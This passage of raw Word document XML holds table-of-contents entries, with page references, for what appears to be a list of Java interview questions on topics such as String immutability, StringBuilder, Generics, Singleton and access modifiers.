                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307494 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="344D8A5C" w14:textId="789051D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49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ere can we use the final keyword?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307495 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1DC1BC6C" w14:textId="318B514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49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will happen if I create the final class?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307496 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C663C46" w14:textId="2B38329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49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String?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307497 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>43</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69231661" w14:textId="06F0A5E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49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y String is immutable in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307498 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>44</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="021E75FD" w14:textId="11B9D3A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49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StringBuffer?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307499 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65A109DB" w14:textId="1CF358E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0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StringBuilder?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307500 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>46</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E03F112" w14:textId="6C0C8D6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0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String, StringBuffer and StringBuilder?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307501 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>47</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="28444091" w14:textId="22613B3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0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comparable and comparator?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307502 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>48</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5D6DCC6C" w14:textId="5D9C29A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03" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cstheme="minorHAnsi"/>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static in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307503 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>48</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="58482B97" w14:textId="1E9001E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0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Generics? What is the use of Generics?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307504 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>49</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="63BD3052" w14:textId="33D22F3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0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Singleton in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307505 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>50</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6BF3AC47" w14:textId="208F802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0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Consider we have Strings as String s1 = “Welcome”, String s2 = “Welcome” and String s3 = “WelcomeOne”. What does s1==s2 represent?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307506 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>52</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E250E9C" w14:textId="4F576C1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0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String constant pool?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307507 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>52</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6EAE6962" w14:textId="3C81013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0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difference between equals() and hashCode() method?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307508 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>53</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="340DD867" w14:textId="311B9F5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0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oes Java support Pointers?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307509 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>54</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1233AE61" w14:textId="451DC28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1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y doesn't java support pointers?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307510 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>54</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="63B5733D" w14:textId="72FD432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1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which language you prefer in terms of security among C, C++, Java and Python?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307511 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4312C73F" w14:textId="1D968DA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1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Is Java 100% object oriented?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307512 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>56</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="42729ECB" w14:textId="0B0E56E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1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can we make java 100% object oriented?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307513 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4242A298" w14:textId="4B62C25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1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Can we create objects of static class?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307514 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>59</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="11647AB0" w14:textId="41E24C2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1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ich compiler is used by Java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307515 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56C360C4" w14:textId="62624CD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1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ere are the hashCode() and equals() methods defined in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307516 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20642D33" w14:textId="306B6E1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1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many design patterns are present in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307517 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>61</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E26C9E1" w14:textId="2294B1E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1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Can we override the static method?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307518 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>62</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="711B9A19" w14:textId="614A621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1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access modifiers in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307519 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
